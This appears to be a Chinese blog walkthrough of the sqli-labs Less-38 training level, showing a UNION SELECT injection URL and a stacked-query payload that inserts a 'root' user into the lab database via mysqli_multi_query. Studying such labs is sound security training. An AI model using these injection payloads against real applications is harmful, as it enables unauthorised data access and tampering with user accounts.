【sqli-labs】 less38 GET -Stacked Query Injection -String based (GET型堆叠查询字符型注入)
2024-09-24 12:44:36
这个直接用union select就可以
http://192.168.136.128/sqli-labs-master/Less-38/?id=0' union select 1,2,3%23
看一下源码,发现这关的关键并不在此
mysqli_multi_query()是可以执行多条语句的
来看这个语句
两条select都得到了执行
这个就涉及到了堆叠注入,参考 https://www.cnblogs.com/0nth3way/articles/7128189.html
http://192.168.136.128/sqli-labs-master/Less-38/?id=1';insert into users(id,username,password) values (15,'root','root')%23
insert执行成功
最新文章
- 利用session_set_save_handler()函数将session保存到MySQL数据库中
- MVC重写DefaultModelBinder实现自定义模型绑定
- Django~Databases
- sql server 2008 数据库的完整性约束
- Virtualbox虚拟机安装Ubuntu图文版
- PHP无限极分类生成树方法
- insertion sort
- 字体图标 icon font
- xcode升级插件失效修复
- 在linux下用tomcat部署java web项目的过程与注意事项(转)
- Json的反序列化 .net Newtonsoft.Json
- docker应用笔记
- CCNA笔记(2)
- C# 通用单例窗体类
- 有效使用django的queset
- docker registry v2与harbor的搭建
- [Node.js] 05 - Modules and Function
- 【java】之彻底明白进制转换
- 资源打包Assetbundle .
- Linux设备驱动剖析之SPI(四)
热门文章
- zookeeper概念与原理
- Android第三方开源下拉框:NiceSpinner
- shell EOF注意点
- Python图像处理库PIL中图像格式转换(一)
- 一个简单RPC框架是怎样炼成的(I)——开局篇
- python (001)----列表
- ZOJ 3814 Sawtooth Puzzle (2014年牡丹江赛区网络赛F题)
- Codeforces Round #306 (Div. 2) A
- 小白学开发(iOS)OC_ 字符串写入文件(2015-08-13)
- hihocoder 1680 hiho字符串2 dp求方案数+递归